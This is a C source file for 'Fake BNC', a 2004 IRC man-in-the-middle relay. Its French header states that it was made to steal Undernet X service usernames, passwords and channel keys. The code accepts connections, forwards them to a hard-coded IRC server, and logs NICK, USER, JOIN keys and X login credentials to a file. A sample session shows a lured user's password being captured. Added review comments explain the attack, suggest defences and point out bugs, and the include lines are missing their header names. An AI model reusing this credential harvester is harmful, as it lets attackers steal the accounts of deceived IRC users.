________________________________________________________________ ____ __ __ / ___________________________________________________________ ____ __ _ / ` \ / \[O9]/ + ,\_____ ___/ . ` |\/ , \__/ . \____ /:/=[ Un affaire de fake-bnc ] =\:\ _____/ ` x || , . " :X \_______________________________ ____ ____ / , ` ` || + , () . x , . ` ' ` \_ \ ,\\_ +\_ \ 'M ` | . || ` | ` , ` , + , ` ,--, + . \\_ \_ \ , \\_ K -+- / |+ -+- . , ` , ,',/ ,'. \_ \ . \\_ \_ \ - | ` / . | ; + + . ` | : . :`` ,_): ' ` \\_ \_ \ \\_` 1 , / ` . . x , .-=+=- `. ,. ,' ` , \_ \ + \\_` \_ \ 1 /\_____ x ' , . . X | ` `--' ` ` \\_ \_ \ , \\_ 1 + \\_ \___________________ , . . ` , + ' , , ; x ._\ \___\\___\ \ . \_ \ \__________________________________/ \ ` , \\_ /:/=[ Aka: ]=\:\ \ \__\__________________________________________ ______________________________ \` \__\ /__/ \\_ /:/=[ phawnky ]=\:\ _// \__\________________________/__/ /* Fake BNC - MKD - phawnky - 2k4 J'ai cree se soft a la demande d'un gars (no shit! juree la...) qui voulait piquer des cservices users/pass et, en bonus, des chans keys. En bref, le code redirect une connection a IRCBNC (defined) et output les trucs interessant qui se passe. J'ai compiler/tester le code et il est 100% fonctionel sous: -Win98 (Avec cygwin) -WinXP sp2 (Avec cygwin) -freebsd 4.x Exemple d'utilisation: ---------------------- @@@@@@@@@@@@@@@@[ irc ]@@@@@@@@@@@@@@@@ (3.56p) wasting your life away in #KKK Hi! can someone test my BNC @ iam.leet.as.fuck.kr port 3000 ? @@@@@@@@@@@@@@@@[ box ]@@@@@@@@@@@@@@@@ <-Funky@-> ./mkd-fbnc 3000 ------------------------------- [MKD] - FakeBNC - phawnky - 2k4 ------------------------------- [+] Listening on port 3000... [+] Incoming connection from: 64.57.75.131 [+] Successfully connected to 216.152.77.10:6667 [+] NICK MuMMy [+] USER tested "64.57.75.131" "iam.leet.as.fuck.kr" I've lost my friends today. [+] Joined chan #KKK [+] X Username: mummy [+] X Passowrd: 1fUKiNg1 [+] Connection Terminated. 
^C

@@@@@@@@@@@@@@@@[ irc ]@@@@@@@@@@@@@@@@
looking good kthxbye
*/

/*
 * NOTE(review): as listed, this program is a man-in-the-middle TCP relay.
 * main() listens on the port given in argv[1]; monitor() connects to the
 * hard-coded IRCBNC:IRCBNC_PORT and copies bytes in both directions;
 * infograbber() scans client-to-server data for NICK, USER, JOIN/join and a
 * "PRIVMSG x@channels.undernet.org" login line, printing what it finds and
 * appending it to LOGF.
 *
 * Why it works: the client speaks plaintext IRC to a host it does not
 * control, so whoever runs that host reads everything, including the service
 * password and channel keys. Connecting to the network directly (over TLS
 * with certificate verification, where the network offers it) keeps a
 * third-party relay out of the path; a password that was typed through an
 * untrusted relay should be treated as disclosed and changed.
 *
 * Artifacts visible in this listing that help when triaging a host: the log
 * file name in LOGF (relative to the working directory), the banner text
 * printed by banner(), and the "[+] ..." line prefixes written to stdout.
 */

/*
 * NOTE(review): the header names after each #include are missing on this
 * page (presumably the angle-bracket part was stripped during extraction),
 * so the listing does not compile as shown.
 */
#include
#include
#include
#include
#include
#include
#include
#include

#define LOGF "./fbnc.log"          // log file, opened in append mode by logshit()
#define IRCBNC "216.152.77.10"     // upstream address monitor() connects to
#define IRCBNC_PORT 6667           // upstream TCP port

// Prototypes
void usage(char *);                      // print banner and usage line
void banner(void);                       // print the program banner
int monitor(int, char *, int);           // relay one client session
void infograbber(char *);                // scan client data and record matches
void stripshit(char *, int);             // remove ':' characters in place
void logshit(char *, char *, char *);    // append one formatted line to a file

/*
 * Entry point: bind a listening TCP socket on the port named in argv[1] and
 * hand each accepted connection to monitor(), one at a time.
 *
 * Exits with a non-zero status if the port argument is missing or if
 * socket(), setsockopt() or bind() fails.
 */
int main(int argc, char *argv[])
{
    int sockfd, newsockfd, portno, clilen;
    struct sockaddr_in serv_addr, cli_addr;
    int yes=1;

    if (argc < 2) {
        usage(argv[0]);
        exit(-1);
    }
    banner();
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Socket() ");
        exit(-1);
    }
    // Allow the listening address to be reused (SO_REUSEADDR).
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes,sizeof(int)) == -1) {
        perror("setsockopt");
        exit(1);
    }
    // Port comes straight from the command line; atoi() reports no errors.
    portno = atoi(argv[1]);
    // Listens on every local interface (INADDR_ANY).
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = INADDR_ANY;
    serv_addr.sin_port = htons(portno);
    if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
        perror("Bind() ");
        exit(-1);
    }
    listen(sockfd,5);
    clilen = sizeof(cli_addr);
    printf("[+] Listening on port %d...\n", portno);
    // Sessions are handled serially: monitor() does not return until the
    // current session ends.
    while(newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen)) {
        // First, the client's IP address: shown on stdout and written to LOGF.
        printf("[+] Incoming connection from: %s\n", inet_ntoa(cli_addr.sin_addr));
        logshit(LOGF, "\n[+] - New session Started - [+]\n" "IP: %s\n", (char *) inet_ntoa(cli_addr.sin_addr));
        monitor(newsockfd, IRCBNC, IRCBNC_PORT);
        logshit(LOGF, "[+] - %s Hung up - [+]", (char *) inet_ntoa(cli_addr.sin_addr));
        // Close the client socket
        close(newsockfd);
    }
    return 0;
}

/* Print the banner followed by a one-line usage message naming progname. */
void usage(char *progname)
{
    banner();
    printf("Usage: %s portnum\n\n", progname);
}

/* Print the fixed three-line program banner to stdout. */
void banner(void)
{
    printf("-------------------------------\n"
           "[MKD] - FakeBNC - phawnky - 2k4\n"
           "-------------------------------\n\n");
}

/*
 * Append one formatted record to the file fname.
 *
 * fname: path opened with mode "a+".
 * fmt:   used directly as the fprintf() format string; every call in this
 *        listing passes a literal format with a single %s.
 * s:     the single string argument supplied to that format.
 *
 * Exits the process if the file cannot be opened.
 */
void logshit(char *fname, char *fmt, char *s)
{
    FILE *log;

    log = fopen(fname, "a+");
    if (!log) {
        perror("fopen() ");
        exit(-1);
    }
    fprintf(log, fmt, s);
    fclose(log);
}

/*
 * Remove every ':' from the first sz bytes of s, in place, and write a
 * terminating NUL after the last byte kept.
 */
void stripshit(char *s, int sz)
{
    int i, j;

    for(i=j=0; i < sz; i++)
        if(s[i] != ':')
            s[j++] = s[i];
    s[j] = 0x00;
}

/*
 * Relay one session between the accepted client socket and the upstream
 * server, passing client-to-server data through infograbber() on the way.
 *
 * sock:   connected client socket.
 * server: used only in the status message below; the connection itself is
 *         made to the IRCBNC macro.
 * port:   likewise used only in the status message; IRCBNC_PORT is what is
 *         connected to.
 *
 * Returns 0 when the relay loop ends. NOTE(review): the connect-failure path
 * uses a bare `return;` in a function declared to return int.
 */
int monitor(int sock, char *server, int port)
{
    struct sockaddr_in sin;
    int rsock;
    char buf[255];
    fd_set rfds;
    int len;

    FD_ZERO(&rfds);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(IRCBNC_PORT);
    sin.sin_addr.s_addr = inet_addr(IRCBNC);
    rsock = socket(AF_INET, SOCK_STREAM, 0);
    if (rsock < 0 || (connect(rsock, (struct sockaddr *) &sin, sizeof(sin))) < 0) {
        perror("[-] connect()");
        return;
    }
    printf("[+] Successfully connected to %s:%d\n", server, port);
    while(1) {
        // Wait until either side has data to read.
        FD_SET(sock, &rfds);
        FD_SET(rsock, &rfds);
        if (select(rsock+1, &rfds, 0x00, 0x00, 0x00) == -1) {
            perror("[-] Select()");
            exit(-1);
        }
        // buf is zeroed and at most sizeof(buf)-1 bytes are read into it, so
        // it is always NUL-terminated for the strlen() calls below.
        bzero(buf, sizeof(buf));
        // Filter for interesting data, then forward it
        if (FD_ISSET(sock, &rfds)) {
            // The client sent data.
            // NOTE(review): `<` binds tighter than `=`, so len receives the
            // result of the comparison rather than a byte count.
            if (len = recv(sock, buf, sizeof(buf)-1, 0) < 0) {
                // The client dropped the connection
                close(rsock);
                break;
            }
            if(strlen(buf))
                infograbber(buf);
            // Filtering and/or modification would go here.
            // The forwarded length is strlen(buf), not the received count.
            if(len = send(rsock, buf, strlen(buf), 0) < 0) {
                close(rsock);
                break;
            }
        }
        bzero(buf, sizeof(buf));
        if(FD_ISSET(rsock, &rfds)) {
            // The server sent data
            if (len = recv(rsock, buf, sizeof(buf)-1, 0) < 0) {
                // The server went away
                close(rsock);
                break;
            }
            if (len = send(sock, buf, strlen(buf), 0) < 0) {
                // The client dropped the connection
                close(rsock);
                break;
            }
        }
    }
    printf("[+] Connection Terminated.\n");
    return 0;
}

/*
 * Scan one chunk of client-to-server data for a fixed set of substrings and
 * record what follows them on stdout and in LOGF.
 *
 * buf: NUL-terminated data as received from the client; it is not modified.
 *      Each search runs on a fresh strdup() copy because strtok() and
 *      stripshit() edit the text in place.
 *
 * The searches use strstr(), so a keyword is matched wherever it occurs in
 * the chunk, not only at the start of a line. The strdup() results are used
 * without a NULL check.
 */
void infograbber(char *buf)
{
    char *bkp;
    char *ptr;
    char *tmp;
    char chan[255], chanpass[255], tmpbuf[510];

    // NICK command?
    bkp = strdup(buf);
    ptr = strstr(bkp, "NICK");
    if (ptr) {
        // Cut at the first newline, drop ':' characters, then record the line.
        strtok(ptr, "\n");
        stripshit(ptr, strlen(ptr));
        printf("[+] %s\n", ptr);
        logshit(LOGF, "%s\n", ptr);
    }
    // USER command?
    free(bkp);
    bkp = strdup(buf);
    ptr = strstr(bkp, "USER");
    if(ptr) {
        strtok(ptr, "\n");
        stripshit(ptr, strlen(ptr));
        printf("[+] %s\n", ptr);
        logshit(LOGF, "%s\n", ptr);
    }
    // JOIN command?
    free(bkp);
    bkp = strdup(buf);
    ptr = strstr(bkp, "JOIN");
    if(ptr) {
        // Every remaining line of the chunk is examined, not only the JOIN line.
        for(tmp = strtok(ptr, "\n"); tmp; tmp = strtok(0x00, "\n")) {
            stripshit(tmp, strlen(tmp));
            // Three fields: command, channel, channel key.
            if(sscanf(tmp, "%s %s %s", tmpbuf, chan, chanpass) == 3) {
                printf("[+] Joined chan %s Using pass: %s\n", chan, chanpass);
                snprintf(tmpbuf, sizeof(tmpbuf)-1, "Joined chan %s Using pass: %s\n", chan, chanpass);
                logshit(LOGF, "%s", tmpbuf);
            } else {
                // NOTE(review): chan is printed here even when sscanf()
                // matched fewer than two fields and did not write it.
                printf("[+] Joined chan %s\n", chan);
                logshit(LOGF, "Joined chan %s\n", chan);
            }
        }
    }
    // Lowercase join command (the original comment says mIRC sends it that way)
    free(bkp);
    bkp = strdup(buf);
    ptr = strstr(bkp, "join");
    if(ptr) {
        for(tmp = strtok(ptr, "\n"); tmp; tmp = strtok(0x00, "\n")) {
            stripshit(tmp, strlen(tmp));
            if(sscanf(tmp, "%s %s %s", tmpbuf, chan, chanpass) == 3) {
                printf("[+] Joined chan %s Using pass: %s\n", chan, chanpass);
                snprintf(tmpbuf, sizeof(tmpbuf)-1, "Joined chan %s Using pass: %s\n", chan, chanpass);
                logshit(LOGF, "%s", tmpbuf);
            } else {
                printf("[+] Joined chan %s\n", chan);
                logshit(LOGF, "Joined chan %s\n", chan);
            }
        }
    }
    // The primary goal: the service login message, of the form
    //PRIVMSG x@channels.undernet.org :login USER PASS\n
    free(bkp);
    bkp = strdup(buf);
    ptr = strstr(bkp, "PRIVMSG x@channels.undernet.org");
    if(ptr) {
        // Walk the tokens of the login line. NOTE(review): the strtok()
        // results are passed to printf()/logshit() without a NULL check.
        tmp = strtok(ptr, ":");      // PRIVMSG x@channels.undernet.org
        tmp = strtok(0x00, " ");     // login
        tmp = strtok(0x00, " ");     // USER
        printf("[+] X Username: %s\n", tmp);
        logshit(LOGF, "X Username: %s\n", tmp);
        tmp = strtok(0x00, "\n");    // PASS
        printf("[+] X Passowrd: %s\n", tmp);
        logshit(LOGF, "X Passowrd: %s\n", tmp);
    }
    free(bkp);
}